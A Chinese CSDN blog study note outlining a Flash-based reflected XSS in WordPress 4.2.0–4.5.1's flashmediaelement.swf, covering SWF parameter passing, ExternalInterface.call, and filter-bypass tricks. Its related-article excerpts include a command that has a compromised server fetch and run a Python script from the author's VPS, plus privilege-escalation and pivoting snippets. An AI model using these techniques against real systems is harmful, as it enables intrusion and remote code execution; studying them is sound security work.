【学习笔记】WordPress 4.2.0-4.5.1 flashmediaelement.swf 反射型 XSS

最新推荐文章于 2020-12-18 16:12:15 发布
最新推荐文章于 2020-12-18 16:12:15 发布
阅读量155 收藏
点赞数
分类专栏: web安全学习笔记 文章标签: flash xss wordpress swf 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chualam/article/details/109409770
版权

实例 wordpress 4.5.1

如果是一般的flash xss 要做反编译swf 然后源码分析

如果是开源项目的 直接github就能找到

如何给flash文件传参

html中的embed标签 中的flashvar变量

可以直接通过/.swf?a=xx&b=xx直接传参

swf的核心代码是.as文件

注意到里面有个关键函数externalinterface.call() 这个call其实就是调用js的函数(help.adobe.com看具体函数调用)

注意objectid等参数可能在不同的游览器取不同的变量 如name

loaderinfo解析参数

利用flashplayer容错机制 在传参的时候 例如 functio%gn=1 会自动把%g干掉 绕过

如果碰到字符过滤 就要想到模板字符串 使用反引号

 

снυαιαм ιее
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
rar-4.2.0-4.el7.x86_64.rpm
01-21
[Linux]Centos系统离线安装rar
gcc-4.2.0-3.aix5.3.ppc.rpm跟g++-4.2.0-3.rar
04-20
aix,gcc,g++,rpm,linux,redhat,uix,gcc-4.2.0-3.aix5.3.ppc.rpm跟g++-4.2.0-3.rar
Dedecms最新版本存储XSS
weixin_33872566的博客
03-15 384
由于编辑文章的模板参数 typeid2可控,导致存储XSS发生。 dedecms/dede/templets/article_edit.htm页面316-325行代码如下: <tr> <td height="24" colspan="2" class="bline"><table width="800" border=
第六天实验详解——dedecms通过xss漏洞写马
weixin_34072857的博客
11-10 310
第六天实验详解 **XSS跨站攻击的分类** XSS漏洞类主要分为持久和非持久两种: 1. 非持久XSS漏洞一般存在于URL参数中,需要访问黑客构造好的特定URL才能触发漏洞。 2. 持久XSS漏洞一般存在于富文本等交互功能,如发帖留言等,黑客使用的XSS内容经正常功能进入数据库持久保存。 > DOM XSS漏洞,也分为持久和非持久两种,多是通过...
基于flash反射xss的利用方法
weixin_34381666的博客
06-10 403
http://zone.wooyun.org/content/368 昨天在测试WEBQQ的时候,利用了这个,回头又在本地测试了一下。----------------------------------------------------在本地 localhost建一个页面,进行了以下测试。通过iframe调用传统的反射XSS,因为iframe页面不同域,被IE9过滤...
存储xss实例分享---基于web靶机的织梦内容管理系统
永不垂头的博客
08-08 398
存储xss实例分享—基于web靶机的织梦内容管理系统 存储xss实例分享: ① 用御剑扫到管理员登录路径: http://192.168.1.105:800/DedeCmsV5.6-GBK-Final/uploads/dede/login.php ② 打开如下: ③ 用xss平台(可以多试几个平台) https://xss8.cc/xss.php?do=project&act=viewcode&ty=create&id=10604 ④ 登录 会员账号/密码:like/12
Swfupload.swf 跨站脚本——漏洞复现
W小哥
12-18 3930
一、swfupload.swf简介 SWFUpload 是一款优秀的 Flash 上传控件,它可以非常好的增强 Web 端程序的用户上传体验。SWFUpload 自由灵活的 JavaScript 接口允许开发者自定义包括 HTML/CSS 在内的几乎所有 UI 样式,被广泛运用在大量站点的上传模块中,如 Youtube 和 WordPress 。 此漏洞可能导致严重的 XSS 安全隐患,但是官方一直没有修复。 二、漏洞复现 payload如下 http://XXX/images/swfupload/swfu
HTML5播放器MediaElement.js用法
热门推荐
WeLoveSunFlower的专栏
08-08 1万+
MediaElement是一款HTML5播放器, 官网:
MediaElement教程
hzz532968708的专栏
07-26 2957
http://code.hs-cn.com/html/jQuery_Download.htm Jquery.min的各个版本链接及下载 http://jquery.com/download/ Jquery官网 http://www.css88.com/jqapi-1.9/ Jquery帮助文档 http://mediaelementjs.com/ 播放器MediaElement.js htt
一次SWF XSS挖掘和利用
weixin_33889245的博客
03-08 871
p.z · 2012/12/28 18:43[ 目录 ][0x00] 背景[0x01] 挖掘漏洞[0x02] 优雅利用[0x03] 从反射到rootkit[0x04] 总结[0x00] 背景这篇迟到了近一年的paper是对 WooYun: Gmail某处XSS可导致账号持久劫持 漏洞的详细说明,赶在世界末日发布,希望不会太晚.:)既然标题已经提到了SWF XSS,那么第一件事就是查找mail.go...
zabbix-agent-4.2.0-1.el7.x86_64.rpm
04-21
zabbix4.2.0客户端,适用于centos7,64位架构的操作系统
R-4.2.0patched-win.exe
05-09
R语言最新版的一个安装包,在Windows上运行, 用于解决最新稳定版的R4.2.0出现了程序中止问题(在Rstudio中), 当调用xlsx这个软件包的时候. 官网下载可能速度较慢.
echarts最新版4.2.0-rc.2
10-23
echarts 4.2.0-rc.2 官方最新版本,js前端必学技术,echarts
学习笔记】进入内网的几种方法
chualam的博客
10-29 3202
当可以通过ssh连接A 目标访问B ssh ip -lrr //空密码连接 ssh ip -D端口 -CNfg(流量压缩) //端口转发 >>export all_proxy=http://127.0.0.1:端口 当不可以通过ssh 下载反弹shell 的py脚本 通过py启动http (python -m SimpleHTTPServer) curl A的ip/shell.php --data "c=system("curl 我的vps的ip/xx.py|python");" nc -l.
学习笔记】常见的提权方式
chualam的博客
10-29 1144
提权:linux 内核提权 配置错误提权(用dirtycow提权) windows 系统漏洞提权 msf 前提:已经通过nc -lvv 监听 find /usr/bin -perm -us=s usid权限文件查询 ls -la /usr/bin/passwd 看到-rwsr-xr-x 1 说明存在suid位 如何提权?用vim.basic提权(可以编辑root才能运行的文件) 然后用python -c 'import pty;pty.spawn("/bin/bash")' 交互式sh...
学习笔记】Hadoop YARN REST API未授权访问
chualam的博客
11-01 843
一般来说 api未授权访问一般导致信息泄露,但是如果包含管理和任务执行功能 就会扩大危害程度 它的restapi开放在xx端口 善用官方文档 看调用使用说明 查看具体调用的位置 curl -v -X post '网站详细地址' 可以得到application id 从官方文档查看调用的具体参数 编辑一个data.json curl -s -i -X POST -H 'accept:application/json' -H 'content-type:application/json' api
学习笔记】 MetInfo 6.0.0 任意文件读取漏洞
chualam的博客
11-02 837
readfile函数(xx) 控制xx里面的内容就可以实现任意读取
学习笔记】74cms v3.6 任意密码重置漏洞
chualam的博客
11-02 777
找回密码页面 抓包改电话
学习笔记】服务器入侵溯源
chualam的博客
08-23 624
操作系统:ubuntu 1)输入命令top查看占用内存的可疑进程及其进程字串符 2)输入命令netstat -anpt查看tcp连接中的可疑地址 然后放到ipip.net和x.threatbook.cn查看详情 3)输入命令ls -lh /proc/进程字串符查看进程的木马存放目录及其名称 4)输入命令kill -9 进程字串符 杀掉木马进程 5)进入到木马目录 输入命令md5sum 木马名称提取md5放到virustotal.com查看木马详情 6)输入命令history |grep...
echarts中^4.2.0-rc.2版本写的折线图示例代码
最新发布
06-10
以下是Echarts ^4.2.0-rc.2版本的折线图示例代码: ```javascript // 基于准备好的dom,初始化echarts实例 var myChart = echarts.init(document.getElementById('main')); // 指定图表的配置项和数据 var option ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值